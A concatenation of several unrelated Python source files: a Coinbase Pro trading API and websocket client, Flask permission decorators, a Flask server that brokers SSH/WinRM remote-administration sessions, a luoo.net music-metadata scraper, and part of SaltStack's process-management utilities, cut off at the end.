if not isinstance(future_price, int) and not isinstance(future_price, float):
raise TypeError("The future crypto price is not numeric.")
try:
order = {
"product_id": market,
"type": "limit",
"side": "sell",
"size": self.marketBaseIncrement(market, base_quantity),
"price": future_price,
}
Logger.debug(order)
model = AuthAPI(
self._api_key, self._api_secret, self._api_passphrase, self._api_url
)
return model.authAPI("POST", "orders", order)
except:
return pd.DataFrame()
def cancelOrders(self, market: str = "") -> pd.DataFrame:
"""Cancels an order"""
if not self._isMarketValid(market):
raise ValueError("Coinbase Pro market is invalid.")
try:
model = AuthAPI(
self._api_key, self._api_secret, self._api_passphrase, self._api_url
)
return model.authAPI("DELETE", "orders")
except:
return pd.DataFrame()
def marketBaseIncrement(self, market, amount) -> float:
"""Retrieves the market base increment"""
product = self.authAPI("GET", f"products/{market}")
if "base_increment" not in product:
return amount
base_increment = str(product["base_increment"].values[0])
if "." in str(base_increment):
nb_digits = len(str(base_increment).split(".")[1])
else:
nb_digits = 0
return floor(amount * 10 ** nb_digits) / 10 ** nb_digits
def marketQuoteIncrement(self, market, amount) -> float:
"""Retrieves the market quote increment"""
product = self.authAPI("GET", f"products/{market}")
if "quote_increment" not in product:
return amount
quote_increment = str(product["quote_increment"].values[0])
if "." in str(quote_increment):
nb_digits = len(str(quote_increment).split(".")[1])
else:
nb_digits = 0
return floor(amount * 10 ** nb_digits) / 10 ** nb_digits
def authAPI(self, method: str, uri: str, payload: str = "") -> pd.DataFrame:
"""Initiates a REST API call"""
if not isinstance(method, str):
raise TypeError("Method is not a string.")
if not method in ["DELETE", "GET", "POST"]:
raise TypeError("Method not DELETE, GET or POST.")
if not isinstance(uri, str):
raise TypeError("URI is not a string.")
try:
if method == "DELETE":
resp = requests.delete(self._api_url + uri, auth=self)
elif method == "GET":
resp = requests.get(self._api_url + uri, auth=self)
elif method == "POST":
resp = requests.post(self._api_url + uri, json=payload, auth=self)
if "msg" in resp.json():
resp_message = resp.json()["msg"]
elif "message" in resp.json():
resp_message = resp.json()["message"]
else:
resp_message = ""
if resp.status_code == 401 and (
resp_message == "request timestamp expired"
):
message = f"{method} ({resp.status_code}) {self._api_url}{uri} - {resp_message} (hint: check your system time is using NTP)"
Logger.error(f"Error: {message}")
return {}
elif resp.status_code != 200:
if self.die_on_api_error or resp.status_code == 401:
# disable traceback
sys.tracebacklimit = 0
raise Exception(
f"{method.upper()} ({resp.status_code}) {self._api_url}{uri} - {resp_message}"
)
else:
Logger.error(
f"error: {method.upper()} ({resp.status_code}) {self._api_url}{uri} - {resp_message}"
)
return pd.DataFrame()
resp.raise_for_status()
if isinstance(resp.json(), list):
df = pd.DataFrame.from_dict(resp.json())
return df
else:
df = pd.DataFrame(resp.json(), index=[0])
return df
except requests.ConnectionError as err:
return self.handle_api_error(err, "ConnectionError")
except requests.exceptions.HTTPError as err:
return self.handle_api_error(err, "HTTPError")
except requests.Timeout as err:
return self.handle_api_error(err, "Timeout")
except json.decoder.JSONDecodeError as err:
return self.handle_api_error(err, "JSONDecodeError")
def handle_api_error(self, err: str, reason: str) -> pd.DataFrame:
"""Handle API errors"""
if self.debug:
if self.die_on_api_error:
raise SystemExit(err)
else:
Logger.error(err)
return pd.DataFrame()
else:
if self.die_on_api_error:
raise SystemExit(f"{reason}: {self._api_url}")
else:
Logger.info(f"{reason}: {self._api_url}")
return pd.DataFrame()
class PublicAPI(AuthAPIBase):
def __init__(self) -> None:
# options
self.debug = False
self.die_on_api_error = False
self._api_url = "https://api.pro.coinbase.com/"
def getHistoricalData(
self,
market: str = DEFAULT_MARKET,
# granularity: int = MAX_GRANULARITY,
granularity: Granularity = Granularity.ONE_HOUR,
websocket=None,
iso8601start: str = "",
iso8601end: str = "",
) -> pd.DataFrame:
"""Retrieves historical market data"""
# validates the market is syntactically correct
if not self._isMarketValid(market):
raise TypeError("Coinbase Pro market required.")
# validates granularity is an integer
if not isinstance(granularity.to_integer, int):
raise TypeError("Granularity integer required.")
# validates the granularity is supported by Coinbase Pro
if not granularity.to_integer in SUPPORTED_GRANULARITY:
raise TypeError(
"Granularity options: " + ", ".join(map(str, SUPPORTED_GRANULARITY))
)
# validates the ISO 8601 start date is a string (if provided)
if not isinstance(iso8601start, str):
raise TypeError("ISO8601 start integer as string required.")
# validates the ISO 8601 end date is a string (if provided)
if not isinstance(iso8601end, str):
raise TypeError("ISO8601 end integer as string required.")
using_websocket = False
if websocket is not None:
if websocket.candles is not None:
try:
df = websocket.candles.loc[websocket.candles["market"] == market]
using_websocket = True
except:
pass
if websocket is None or (websocket is not None and using_websocket is False):
if iso8601start != "" and iso8601end == "":
resp = self.authAPI(
"GET",
f"products/{market}/candles?granularity={granularity.to_integer}&start={iso8601start}",
)
elif iso8601start != "" and iso8601end != "":
resp = self.authAPI(
"GET",
f"products/{market}/candles?granularity={granularity.to_integer}&start={iso8601start}&end={iso8601end}",
)
else:
resp = self.authAPI(
"GET", f"products/{market}/candles?granularity={granularity.to_integer}"
)
# convert the API response into a Pandas DataFrame
df = pd.DataFrame(
resp, columns=["epoch", "low", "high", "open", "close", "volume"]
)
# reverse the order of the response with earliest last
df = df.iloc[::-1].reset_index()
try:
freq = FREQUENCY_EQUIVALENTS[SUPPORTED_GRANULARITY.index(granularity.to_integer)]
except:
freq = "D"
# convert the DataFrame into a time series with the date as the index/key
try:
tsidx = pd.DatetimeIndex(
pd.to_datetime(df["epoch"], unit="s"),
dtype="datetime64[ns]",
freq=freq,
)
df.set_index(tsidx, inplace=True)
df = df.drop(columns=["epoch", "index"])
df.index.names = ["ts"]
df["date"] = tsidx
except ValueError:
tsidx = pd.DatetimeIndex(
pd.to_datetime(df["epoch"], unit="s"), dtype="datetime64[ns]"
)
df.set_index(tsidx, inplace=True)
df = df.drop(columns=["epoch", "index"])
df.index.names = ["ts"]
df["date"] = tsidx
df["market"] = market
df["granularity"] = granularity.to_integer
# re-order columns
df = df[
[
"date",
"market",
"granularity",
"low",
"high",
"open",
"close",
"volume",
]
]
return df
def getTicker(self, market: str = DEFAULT_MARKET, websocket=None) -> tuple:
"""Retrieves the market ticker"""
# validates the market is syntactically correct
if not self._isMarketValid(market):
raise TypeError("Coinbase Pro market required.")
now = datetime.today().strftime("%Y-%m-%d %H:%M:%S")
if websocket is not None and websocket.tickers is not None:
try:
row = websocket.tickers.loc[websocket.tickers["market"] == market]
return (
datetime.strptime(
re.sub(r".0*$", "", str(row["date"].values[0])),
"%Y-%m-%dT%H:%M:%S",
).strftime("%Y-%m-%d %H:%M:%S"),
float(row["price"].values[0]),
)
except:
return (now, 0.0)
resp = self.authAPI("GET", f"products/{market}/ticker")
if "time" in resp and "price" in resp:
"""Check if milliseconds (%f) are more then 6 digits. If so truncate for datetime which doesn't support more"""
if len(resp["time"].split('.')[1]) > 7: resp["time"]=resp["time"][:26] + 'Z'
return (
datetime.strptime(resp["time"], "%Y-%m-%dT%H:%M:%S.%fZ").strftime(
"%Y-%m-%d %H:%M:%S"
),
float(resp["price"]),
)
return (now, 0.0)
def getTime(self) -> datetime:
"""Retrieves the exchange time"""
try:
resp = self.authAPI("GET", "time")
if "epoch" in resp:
epoch = int(resp["epoch"])
return datetime.fromtimestamp(epoch)
else:
Logger.error(
"resp does not contain the epoch key for some reason!"
) # remove this later
Logger.error(resp)
return None
except Exception as e:
Logger.error(f"Error: {e}")
return None
def getMarkets24HrStats(self) -> pd.DataFrame():
"""Retrieves exchange markets 24hr stats"""
try:
return self.authAPI("GET", "products/stats")
except:
return pd.DataFrame()
def authAPI(self, method: str, uri: str, payload: str = "") -> dict:
"""Initiates a REST API call"""
if not isinstance(method, str):
raise TypeError("Method is not a string.")
if not method in ["GET", "POST"]:
raise TypeError("Method not GET or POST.")
if not isinstance(uri, str):
raise TypeError("URI is not a string.")
try:
if method == "GET":
resp = requests.get(self._api_url + uri)
elif method == "POST":
resp = requests.post(self._api_url + uri, json=payload)
if resp.status_code != 200:
resp_message = resp.json()["message"]
message = f"{method} ({resp.status_code}) {self._api_url}{uri} - {resp_message}"
if self.die_on_api_error:
raise Exception(message)
else:
Logger.error(f"Error: {message}")
return {}
resp.raise_for_status()
return resp.json()
except requests.ConnectionError as err:
Logger.error("requests.ConnectionError") # remove this later
return self.handle_api_error(err, "ConnectionError")
except requests.exceptions.HTTPError as err:
Logger.error("requests.exceptions.HTTPError") # remove this later
return self.handle_api_error(err, "HTTPError")
except requests.Timeout as err:
Logger.error("requests.Timeout") # remove this later
return self.handle_api_error(err, "Timeout")
except json.decoder.JSONDecodeError as err:
Logger.error("json.decoder.JSONDecodeError") # remove this later
return self.handle_api_error(err, "JSONDecodeError")
def handle_api_error(self, err: str, reason: str) -> dict:
"""Handle API errors"""
if self.debug:
if self.die_on_api_error:
raise SystemExit(err)
else:
Logger.error(err)
return {}
else:
if self.die_on_api_error:
raise SystemExit(f"{reason}: {self._api_url}")
else:
Logger.info(f"{reason}: {self._api_url}")
return {}
class WebSocket(AuthAPIBase):
def __init__(
self,
markets=None,
# granularity=None,
granularity: Granularity = Granularity.ONE_HOUR,
api_url="https://api.pro.coinbase.com",
ws_url="wss://ws-feed.pro.coinbase.com",
) -> None:
# options
self.debug = False
valid_urls = [
"https://api.pro.coinbase.com",
"https://api.pro.coinbase.com/",
"https://public.sandbox.pro.coinbase.com",
"https://public.sandbox.pro.coinbase.com/",
]
# validate Coinbase Pro API
if api_url not in valid_urls:
raise ValueError("Coinbase Pro API URL is invalid")
if api_url[-1] != "/":
api_url = api_url + "/"
valid_ws_urls = [
"wss://ws-feed.pro.coinbase.com",
"wss://ws-feed.pro.coinbase.com/",
]
# validate Coinbase Pro Websocket URL
if ws_url not in valid_ws_urls:
raise ValueError("Coinbase Pro WebSocket URL is invalid")
if ws_url[-1] != "/":
ws_url = ws_url + "/"
self._ws_url = ws_url
self._api_url = api_url
self.markets = None
self.granularity = granularity
self.type = "subscribe"
self.stop = True
self.error = None
self.ws = None
self.thread = None
self.start_time = None
self.time_elapsed = 0
def start(self):
def _go():
self._connect()
self._listen()
self._disconnect()
self.stop = False
self.on_open()
self.thread = Thread(target=_go)
self.keepalive = Thread(target=self._keepalive)
self.thread.start()
def _connect(self):
if self.markets is None:
print("Error: no market specified!")
sys.exit()
elif not isinstance(self.markets, list):
self.markets = [self.markets]
self.ws = create_connection(self._ws_url)
self.ws.send(
json.dumps(
{
"type": "subscribe",
"product_ids": self.markets,
"channels": ["matches"],
}
)
)
self.start_time = datetime.now()
def _keepalive(self, interval=30):
while self.ws.connected:
self.ws.ping("keepalive")
time.sleep(interval)
def _listen(self):
self.keepalive.start()
while not self.stop:
try:
data = self.ws.recv()
if data != "":
msg = json.loads(data)
else:
msg = {}
except ValueError as e:
self.on_error(e)
except Exception as e:
self.on_error(e)
else:
self.on_message(msg)
def _disconnect(self):
try:
if self.ws:
self.ws.close()
except WebSocketConnectionClosedException:
pass
finally:
self.keepalive.join()
def close(self):
self.stop = True
self.start_time = None
self.time_elapsed = 0
self._disconnect()
self.thread.join()
def on_open(self):
Logger.info("-- Websocket Subscribed! --")
def on_close(self):
Logger.info("-- Websocket Closed --")
def on_message(self, msg):
Logger.info(msg)
def on_error(self, e, data=None):
Logger.error(e)
Logger.error("{} - data: {}".format(e, data))
self.stop = True
try:
self.ws = None
self.tickers = None
self.candles = None
self.start_time = None
self.time_elapsed = 0
except:
pass
def getStartTime(self) -> datetime:
return self.start_time
def getTimeElapsed(self) -> int:
return self.time_elapsed
class WebSocketClient(WebSocket):
def __init__(
self,
markets: list = [DEFAULT_MARKET],
# granularity: str = DEFAULT_GRANULARITY,
granularity: Granularity = Granularity.ONE_HOUR,
api_url="https://api.pro.coinbase.com/",
ws_url: str = "wss://ws-feed.pro.coinbase.com",
) -> None:
if len(markets) == 0:
raise ValueError("A list of one or more markets is required.")
for market in markets:
# validates the market is syntactically correct
if not self._isMarketValid(market):
raise ValueError("Coinbase Pro market is invalid.")
# validates granularity is an integer
if not isinstance(granularity.to_integer, int):
raise TypeError("Granularity integer required.")
# validates the granularity is supported by Coinbase Pro
if not granularity.to_integer in SUPPORTED_GRANULARITY:
raise TypeError(
"Granularity options: " + ", ".join(map(str, SUPPORTED_GRANULARITY))
)
valid_urls = [
"https://api.pro.coinbase.com",
"https://api.pro.coinbase.com/",
"https://public.sandbox.pro.coinbase.com",
"https://public.sandbox.pro.coinbase.com/",
]
# validate Coinbase Pro API
if api_url not in valid_urls:
raise ValueError("Coinbase Pro API URL is invalid")
if api_url[-1] != "/":
api_url = api_url + "/"
valid_ws_urls = [
"wss://ws-feed.pro.coinbase.com",
"wss://ws-feed.pro.coinbase.com/",
]
# validate Coinbase Pro Websocket URL
if ws_url not in valid_ws_urls:
raise ValueError("Coinbase Pro WebSocket URL is invalid")
if ws_url[-1] != "/":
ws_url = ws_url + "/"
self._ws_url = ws_url
self.markets = markets
self.granularity = granularity
self.tickers = None
self.candles = None
self.start_time = None
self.time_elapsed = 0
def on_open(self):
self.message_count = 0
def on_message(self, msg):
if self.start_time is not None:
self.time_elapsed = round(
(datetime.now() - self.start_time).total_seconds()
)
if "time" in msg and "product_id" in msg and "price" in msg:
# create dataframe from websocket message
df = pd.DataFrame(
columns=["date", "market", "price"],
data=[
[
datetime.strptime(
msg["time"], "%Y-%m-%dT%H:%M:%S.%fZ"
).strftime("%Y-%m-%d %H:%M:%S"),
msg["product_id"],
msg["price"],
]
],
)
# set column types
df["date"] = df["date"].astype("datetime64[ns]")
df["price"] = df["price"].astype("float64")
# form candles
df["candle"] = df["date"].dt.floor(freq=self.granularity.frequency)
# candles dataframe is empty
if self.candles is None:
resp = PublicAPI().getHistoricalData(
df["market"].values[0], self.granularity
)
if len(resp) > 0:
self.candles = resp
else:
# create dataframe from websocket message
self.candles = pd.DataFrame(
columns=[
"date",
"market",
"granularity",
"open",
"high",
"close",
"low",
"volume",
],
data=[
[
df["candle"].values[0],
df["market"].values[0],
self.granularity.to_integer,
df["price"].values[0],
df["price"].values[0],
df["price"].values[0],
df["price"].values[0],
msg["size"],
]
],
)
# candles dataframe contains some data
else:
# check if the current candle exists
candle_exists = (
(self.candles["date"] == df["candle"].values[0])
& (self.candles["market"] == df["market"].values[0])
).any()
if not candle_exists:
# populate historical data via api if it does not exist
if (
len(
self.candles[
self.candles["market"] == df["market"].values[0]
]
)
== 0
):
resp = PublicAPI().getHistoricalData(
df["market"].values[0], self.granularity
)
if len(resp) > 0:
df_new_candle = resp
else:
# create dataframe from websocket message
df_new_candle = pd.DataFrame(
columns=[
"date",
"market",
"granularity",
"open",
"high",
"close",
"low",
"volume",
],
data=[
[
df["candle"].values[0],
df["market"].values[0],
self.granularity.to_integer,
df["price"].values[0],
df["price"].values[0],
df["price"].values[0],
df["price"].values[0],
msg["size"],
]
],
)
else:
df_new_candle = pd.DataFrame(
columns=[
"date",
"market",
"granularity",
"open",
"high",
"close",
"low",
"volume",
],
data=[
[
df["candle"].values[0],
df["market"].values[0],
self.granularity.to_integer,
df["price"].values[0],
df["price"].values[0],
df["price"].values[0],
df["price"].values[0],
msg["size"],
]
],
)
self.candles = self.candles.append(df_new_candle)
else:
candle = self.candles[
(
(self.candles["date"] == df["candle"].values[0])
& (self.candles["market"] == df["market"].values[0])
)
]
# set high on high
if float(df["price"].values[0]) > float(candle.high.values[0]):
self.candles.at[candle.index.values[0], "high"] = df[
"price"
].values[0]
self.candles.at[candle.index.values[0], "close"] = df[
"price"
].values[0]
# set low on low
if float(df["price"].values[0]) < float(candle.low.values[0]):
self.candles.at[candle.index.values[0], "low"] = df[
"price"
].values[0]
# increment candle base volume
self.candles.at[candle.index.values[0], "volume"] = float(
candle["volume"].values[0]
) + float(msg["size"])
# insert first entry
if self.tickers is None and len(df) > 0:
self.tickers = df
# append future entries without duplicates
elif self.tickers is not None and len(df) > 0:
self.tickers = (
pd.concat([self.tickers, df])
.drop_duplicates(subset="market", keep="last")
.reset_index(drop=True)
)
# convert dataframes to a time series
tsidx = pd.DatetimeIndex(
pd.to_datetime(self.tickers["date"]).dt.strftime("%Y-%m-%dT%H:%M:%S.%Z")
)
self.tickers.set_index(tsidx, inplace=True)
self.tickers.index.name = "ts"
tsidx = pd.DatetimeIndex(
pd.to_datetime(self.candles["date"]).dt.strftime("%Y-%m-%dT%H:%M:%S.%Z")
)
self.candles.set_index(tsidx, inplace=True)
self.candles.index.name = "ts"
# set correct column types
self.candles["open"] = self.candles["open"].astype("float64")
self.candles["high"] = self.candles["high"].astype("float64")
self.candles["close"] = self.candles["close"].astype("float64")
self.candles["low"] = self.candles["low"].astype("float64")
self.candles["volume"] = self.candles["volume"].astype("float64")
# keep last 300 candles per market
self.candles = self.candles.groupby("market").tail(300)
# print (f'{msg["time"]} {msg["product_id"]} {msg["price"]}')
# print(json.dumps(msg, indent=4, sort_keys=True))
self.message_count += 1
|
decorators.py
|
# -*- coding: utf-8 -*-
"""
decorators
~~~~~~~~~~~~~~
Decorators definition.
:copyright: (c) 2016 by fengweimin.
:date: 16/8/15
"""
from functools import wraps
from threading import Thread
from flask import abort
from flask_login import current_user
def async_exec(f):
""" Async execution. """
@wraps(f)
def wrapper(*args, **kwargs):
thr = Thread(target=f, args=args, kwargs=kwargs)
# https://docs.python.org/3/library/threading.html#threading.Thread.daemon
thr.setDaemon(True)
thr.start()
return wrapper
def auth_permission(f):
""" Check auth permission and other business checking.
:return:
"""
@wraps(f)
def wrapper(*args, **kwargs):
if current_user.is_anonymous:
abort(401)
if current_user.is_rejected:
abort(403)
return f(*args, **kwargs)
return wrapper
def admin_permission(f):
""" Check admin permission and other business checking.
:return:
"""
@wraps(f)
def wrapper(*args, **kwargs):
if current_user.is_anonymous:
abort(401)
if not current_user.is_admin:
abort(403)
return f(*args, **kwargs)
return wrapper
|
Server.py
|
from flask import Flask, request
from SSH import SSHConnector
from SSHTunnel import SSHTunnelConnector
#from waitress import serve
from WinRM import WinRMConnector
import os
import time
import sys
import threading
import warnings
app = Flask("LIMAN")
connections = {}
@app.route("/new", methods=['POST'])
def new_connection():
# Set Variables for easier access
username = request.values.get("username")
hostname = request.values.get("hostname")
password = request.values.get("password")
connection_type = request.values.get("connection_type")
domain = request.values.get("domain")
fqdn = request.values.get("fqdn")
custom_ip = request.values.get("custom_ip")
port = request.values.get("port")
port = port if port is not None else "5986"
# Validate Inputs.
if username is None or password is None or hostname is None or connection_type is None:
return {"error": "Missing Parameters"}, 400
if connection_type == "winrm":
connector = WinRMConnector(domain=domain, fqdn= fqdn, custom_ip=custom_ip,port=port)
elif connection_type == "ssh":
connector = SSHConnector(port=port)
elif connection_type == "ssh_tunnel":
connector = SSHTunnelConnector(request.values.get("remote_port"))
else:
return {"error": "Unknown Type"}, 404
# Set Credentials
connector.set_credentials(username=username, password=password, hostname=hostname)
# Initialize Connector
connector.init()
# Retrieve Token
token = connector.get_token()
# Store Class
connections[token] = connector
# Simply return token to use
return {"token": token, "ticket_path": connector.get_path()}, 200
@app.route("/run", methods=['POST'])
def execute_command():
command = request.values.get("command")
token = request.values.get("token")
try:
connection = connections[token]
except Exception:
return {"error": "Token Not found"}, 404
return {"output": connection.execute(command)}, 200
@app.route("/stop", methods=['POST'])
def stop_connector():
token = request.values.get("token")
try:
connection = connections[token]
except Exception:
return {"error": "Token Not found"}, 404
connection.close()
del connections[token]
return {"output": "ok"}, 200
@app.route("/verify", methods=['POST'])
def verify_token():
token = request.values.get("token")
try:
connection = connections[token]
except Exception:
return {"error": "Token Not found"}, 404
try:
connection.execute("hostname")
except Exception:
del connections[token]
return {"error": "Kerberos Expired"}, 413
return {"message": "Token working"}, 200
@app.route("/send", methods=['POST'])
def send_file():
token = request.values.get("token")
local_path = request.values.get("local_path")
remote_path = request.values.get("remote_path")
try:
connection = connections[token]
except Exception:
return {"error": "Token Not found"}, 404
try:
flag = connection.send_file(local_path, remote_path)
except Exception as e:
flag = False
if flag is True:
return {"output": "ok"}, 200
else:
return {"output": "no"}, 201
@app.route("/get", methods=['POST'])
def get_file():
token = request.values.get("token")
local_path = request.values.get("local_path")
remote_path = request.values.get("remote_path")
try:
connection = connections[token]
except Exception:
return {"error": "Token Not found"}, 404
try:
flag = connection.get_file(local_path, remote_path)
except Exception as e:
flag = False
if flag is True:
return {"output": "ok"}, 200
else:
return {"output": "no"}, 201
def run():
global connections
while True:
time.sleep(3)
for connection in list(connections):
if not connections[connection].keep_alive():
print("CLOSING " + connection)
try:
sys.stderr = open(os.devnull, 'w')
connections[connection].close()
except Exception as e:
pass
sys.stderr = sys.__stderr__
del connections[connection]
if __name__ == "__main__":
#Clean up old configs and tickets.
os.system("rm /tmp/krb5* 2>/dev/null 1>/dev/null")
thread = threading.Thread(target=run)
thread.start()
#Start
app.run(host='127.0.0.1',threaded=True)
|
GetLuooMp3.py
|
import os
import requests
import time
from bs4 import BeautifulSoup
from faker import Factory
import queue
import threading
from sqlalchemy import Column, String, create_engine
from sqlalchemy import Integer
from sqlalchemy import Text
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base
fake = Factory.create()
spider_queue = queue.Queue()
Base = declarative_base()
luoo_site = 'http://www.luoo.net/music/'
luoo_site_mp3 = 'http://luoo-mp3.kssws.ks-cdn.com/low/luoo/radio%s/%s.mp3'
dist = '/Users/huanglei/Desktop/aa/'
headers = {
'Connection': 'keep-alive',
'User-Agent': fake.user_agent()
}
# 初始化数据库连接: 格式:'数据库类型+数据库驱动名称://用户名:口令@机器地址:端口号/数据库名'
engine = create_engine('mysql+mysqlconnector://root:root@localhost:3306/appserver')
# 创建DBSession类型:
DBSession = sessionmaker(bind=engine)
class LuooSpecial(Base):
__tablename__ = "luoo_special"
# create table luoo_special(number int primary key,title varchar(60),cover varchar(256),des text,count int,url varchar(256));
number = Column(Integer(), primary_key=True)
title = Column(String(60))
cover = Column(String(256))
des = Column(Text())
count = Column(Integer())
url = Column(String(256))
class LuooMusic(Base):
__tablename__ = "luoo_music"
# create table luoo_music(_id varchar(60) primary key,number int,special_id int,name varchar(60),local_path varchar(256),url_path varchar(256));
_id = Column(String(60), primary_key=True)
number = Column(Integer())
special_id = Column(Integer())
name = Column(String(60))
local_path = Column(String(256))
url_path = Column(String(256))
def fix_characters(s):
for c in ['<', '>', ':', '"', '/', '\\', '|', '?', '*']:
s = s.replace(c, '')
return s
def spider(vol):
url = luoo_site + vol
print('crawling: ' + url + '\n')
res = requests.get(url)
if res.status_code != 200:
return
title = ''
soup = BeautifulSoup(res.content, 'html.parser')
titleSoup = soup.find('span', attrs={'class': 'vol-title'})
if titleSoup != None:
title = soup.find('span', attrs={'class': 'vol-title'}).text
if len(title) == 0:
return
coverSoup = soup.find('img', attrs={'class': 'vol-cover'})
if coverSoup != None:
cover = soup.find('img', attrs={'class': 'vol-cover'})['src']
if len(cover) == 0:
return
desc = soup.find('div', attrs={'class': 'vol-desc'})
track_names = soup.find_all('a', attrs={'class': 'trackname'})
track_count = len(track_names)
tracks = []
for track in track_names:
# 12期前的音乐编号1~9是1位(如:1~9),之后的都是2位 1~9会在左边垫0(如:01~09)
_id = str(int(track.text[:2])) if (int(vol) < 12) else track.text[:2]
_name = fix_characters(track.text[4:])
tracks.append({'id': _id, 'name': _name})
phases = {
'url': url,
'phase': vol, # 期刊编号
'title': title, # 期刊标题
'cover': cover, # 期刊封面
'desc': desc, # 期刊描述
'track_count': track_count, # 节目数
'tracks': tracks # 节目清单(节目编号,节目名称)
}
# print("phases:", phases)
#spider_queue.put(phases)
download(phases)
def download(phases):
desTag = phases['desc']
des = desTag.text
# 创建session对象:
session = DBSession()
# 创建新LuooSpecial对象:
luoo_special = LuooSpecial(number=phases['phase'], title=phases['title'],
cover=phases['cover'], des=des,
count=phases['track_count'], url=phases['url'])
# 添加到session:
session.add(luoo_special)
for track in phases['tracks']:
file_url = luoo_site_mp3 % (phases['phase'], track['id'])
local_file_dict = '%s/%s' % (dist, phases['phase'])
# 添加音乐
luoo_music = LuooMusic(_id=str(phases['phase'] + '-' + str(track['id']) + "-" + str(time.time())),
number=track['id'],
special_id=phases['phase'], name=track['name'],
local_path=local_file_dict, url_path=file_url)
session.add(luoo_music)
# if not os.path.exists(local_file_dict):
# os.makedirs(local_file_dict)
#
# local_file = '%s/%s.%s.mp3' % (local_file_dict, track['id'], track['name'])
# if not os.path.isfile(local_file):
# print('downloading: ' + track['name'])
# res = requests.get(file_url, headers=headers)
# with open(local_file, 'wb') as f:
# f.write(res.content)
# f.close()
# print('done.\n')
# else:
# print('break: ' + track['name'])
# 提交即保存到数据库:
session.commit()
# 关闭session:
session.close()
def downloadLoop():
print('thread %s is running...' % threading.current_thread().name)
while True:
if (spider_queue.qsize() <= 0):
return
else:
phases = spider_queue.get()
download(phases)
print('thread %s ended.' % threading.current_thread().name)
def saveLuooInfo():
pass
if __name__ == '__main__':
vols = range(1, 10)
for vol in vols:
print(str(vol))
spider(str(vol))
print('thread %s is running...' % threading.current_thread().name)
t = threading.Thread(target=downloadLoop, name='LoopThread') # 创建线程 指定方法和线程名称
t.start() # 启动线程
t.join() #
print('thread %s ended.' % threading.current_thread().name)
|
process.py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
# Import python libs
import logging
import os
import time
import sys
import multiprocessing
import signal
import threading
import Queue
# Import salt libs
import salt.utils
import salt.ext.six as six
log = logging.getLogger(__name__)
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
try:
import systemd.daemon
HAS_PYTHON_SYSTEMD = True
except ImportError:
HAS_PYTHON_SYSTEMD = False
def set_pidfile(pidfile, user):
'''
Save the pidfile
'''
pdir = os.path.dirname(pidfile)
if not os.path.isdir(pdir) and pdir:
os.makedirs(pdir)
try:
with salt.utils.fopen(pidfile, 'w+') as ofile:
ofile.write(str(os.getpid()))
except IOError:
pass
log.debug(('Created pidfile: {0}').format(pidfile))
if salt.utils.is_windows():
return True
import pwd # after confirming not running Windows
#import grp
try:
pwnam = pwd.getpwnam(user)
uid = pwnam[2]
gid = pwnam[3]
#groups = [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
except IndexError:
sys.stderr.write(
'Failed to set the pid to user: {0}. The user is not '
'available.\n'.format(
user
)
)
sys.exit(os.EX_NOUSER)
if os.getuid() == uid:
# The current user already owns the pidfile. Return!
return
try:
os.chown(pidfile, uid, gid)
except OSError as err:
msg = (
'Failed to set the ownership of PID file {0} to user {1}.'.format(
pidfile, user
)
)
log.debug('{0} Traceback follows:\n'.format(msg), exc_info=True)
sys.stderr.write('{0}\n'.format(msg))
sys.exit(err.errno)
log.debug('Chowned pidfile: {0} to user: {1}'.format(pidfile, user))
def clean_proc(proc, wait_for_kill=10):
'''
Generic method for cleaning up multiprocessing procs
'''
# NoneType and other fun stuff need not apply
if not proc:
return
try:
waited = 0
while proc.is_alive():
proc.terminate()
waited += 1
time.sleep(0.1)
if proc.is_alive() and (waited >= wait_for_kill):
log.error(
'Process did not die with terminate(): {0}'.format(
proc.pid
)
)
os.kill(proc.pid, signal.SIGKILL)
except (AssertionError, AttributeError):
# Catch AssertionError when the proc is evaluated inside the child
# Catch AttributeError when the process dies between proc.is_alive()
# and proc.terminate() and turns into a NoneType
pass
def os_is_running(pid):
'''
Use OS facilities to determine if a process is running
'''
if HAS_PSUTIL:
return psutil.pid_exists(pid)
else:
try:
os.kill(pid, 0) # SIG 0 is the "are you alive?" signal
return True
except OSError:
return False
class ThreadPool(object):
'''
This is a very VERY basic threadpool implementation
This was made instead of using multiprocessing ThreadPool because
we want to set max queue size and we want to daemonize threads (neither
is exposed in the stdlib version).
Since there isn't much use for this class as of right now this implementation
Only supports daemonized threads and will *not* return results
TODO: if this is found to be more generally useful it would be nice to pull
in the majority of code from upstream or from http://bit.ly/1wTeJtM
'''
def __init__(self,
num_threads=None,
queue_size=0):
# if no count passed, default to number of CPUs
if num_threads is None:
num_threads = multiprocessing.cpu_count()
self.num_threads = num_threads
# create a task queue of queue_size
self._job_queue = Queue.Queue(queue_size)
self._workers = []
# create worker threads
for idx in xrange(num_threads):
thread = threading.Thread(target=self._thread_target)
thread.daemon = True
thread.start()
self._workers.append(thread)
# intentionally not called "apply_async" since we aren't keeping track of
# the return at all, if we want to make this API compatible with multiprocessing
# threadpool we can in the future, and we won't have to worry about name collision
def fire_async(self, func, args=None, kwargs=None):
if args is None:
args = []
if kwargs is None:
kwargs = {}
try:
self._job_queue.put((func, args, kwargs), False)
return True
except Queue.Full:
return False
def _thread_target(self):
while True:
# 1s timeout so that if the parent dies this thread will die after 1s
try:
func, args, kwargs = self._job_queue.get(timeout=1)
except Queue.Empty:
continue
try:
func(*args, **kwargs)
except Exception:
pass
class ProcessManager(object):
'''
A class which will manage processes that should be running
'''
def __init__(self, name=None, wait_for_kill=1):
# pid -> {tgt: foo, Process: object, args: args, kwargs: kwargs}
self._process_map = {}
self.name = name
if self.name is None:
self.name = self.__class__.__name__
self.wait_for_kill = wait_for_kill
# store some pointers for the SIGTERM handler
self._pid = os.getpid()
self._sigterm_handler = signal.getsignal(signal.SIGTERM)
def add_process(self, tgt, args=None, kwargs=None):
'''
Create a processes and args + kwargs
This will deterimine if it is a Process class, otherwise it assumes
it is a function
'''
if args is None:
args = []
if kwargs is None:
kwargs = {}
if type(multiprocessing.Process) == type(tgt) and issubclass(tgt, multiprocessing.Process):
p = tgt(*args, **kwargs)
else:
p = multiprocessing.Process(target=tgt, args=args, kwargs=kwargs)
p.start()
log.debug("Started '{0}' with pid {1}".format(tgt.__name__, p.pid))
self._process_map[p.pid] = {'tgt': tgt,
'args': args,
'kwargs': kwargs,
'Process': p}
def restart_process(self, pid):
'''
Create new process (assuming this one is dead), then remove the old one
'''
log.info(('Process {0} ({1}) died with exit status {2},'
' restarting...').format(self._process_map[pid]['tgt'],
pid,
